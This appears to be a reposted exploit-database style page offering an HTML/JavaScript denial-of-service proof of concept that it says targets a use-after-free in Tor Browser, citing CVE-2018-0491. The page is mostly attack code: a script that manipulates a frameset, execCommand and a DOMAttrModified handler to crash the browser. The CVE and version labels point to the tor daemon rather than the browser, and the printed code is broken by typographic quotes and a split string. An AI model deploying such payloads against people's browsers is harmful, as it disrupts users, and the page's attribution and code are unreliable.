Tor Browser – Use After Free Vulnerability DOS

tor

# Exploit Title: Tor Browser – Use After Free Vulnerability
# Date: 09.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: *https://www.torproject.org/ <https://www.torproject.org/>*
# Software Link:
*https://www.torproject.org/download/download-easy.html.en
<https://www.torproject.org/download/download-easy.html.en>*
# Version: Tor 0.3.2.x before 0.3.2.10
# Tested on: Kali Linux
# CVE : CVE-2018-0491

#Run exploit, result DOS
[su_quote]
<!DOCTYPE html>
<html>
<title>veryhandsome jameel naboo</title>
<body>
<script>
function send()
{
try { document.body.contentEditable = ‘true’; } catch(e){}
try { var e0 = document.createElement(“frameset”); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement(“BBBBBBBBBBBBBBB”)); } catch(e){}
try {
e0.addEventListener(“DOMAttrModified”,function(){document.execCommand(“SelectAll”);e0[‘bo
rder’]=’-4400000000′;}, false); e0.focus();} catch(e){}
try { e0.setAttribute(‘iframe’); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}
}
send();</script></html>
[/su_quote]

Please follow and like us: